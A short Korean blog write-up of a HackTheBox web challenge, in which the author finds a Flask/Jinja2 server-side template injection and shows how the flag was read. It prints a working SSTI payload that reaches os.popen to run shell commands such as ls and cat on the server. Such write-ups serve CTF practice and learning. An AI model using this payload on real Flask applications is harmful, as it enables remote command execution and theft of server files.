Flask로 만들어져있다고 한다.
Jinja2는 Flask에 내장되어있는 템플릿 엔진이라고 하는데 문제이름도 템플릿이고 템플릿 엔진이라고 하니까 플라스크 템플릿 취약점이라고 구글링하니까 SSTI(Server Side Template Injection)라는 취약점이 있다.
이론적인건 나중에 보고 익스플로잇하는 방법들을 좀 찾아봤다.
가장 기본적으로 {{7*7}}을 넣어보니까
이렇게 49가 나온다
구글링을 해보니 리눅스 커맨드를 실행하려면
"{{ (config|attr("__class__")).__init__.__globals__['os'].popen('cat flag').read() }}"
이렇게 해야되는것 같으니 cat flag 자리에 ls를 넣었더니
flag.txt 가 바로 보인다.
똑같은 방식으로 cat flag.txt를 실행시켰더니 바로 flag가 나온다.
이번 문제는 걍 취약점 이름으로 무지성 구글링하다 얻어걸린것 같아서 좀 찝찝하긴하다
'Hacking > HTB' 카테고리의 다른 글
| Mobile - Cat (0) | 2021.05.30 |
|---|---|
| Misc - misDIRection (0) | 2021.05.30 |
| WEB - Phonebook (0) | 2021.05.30 |
| WEB - Emdee five for life (0) | 2021.05.30 |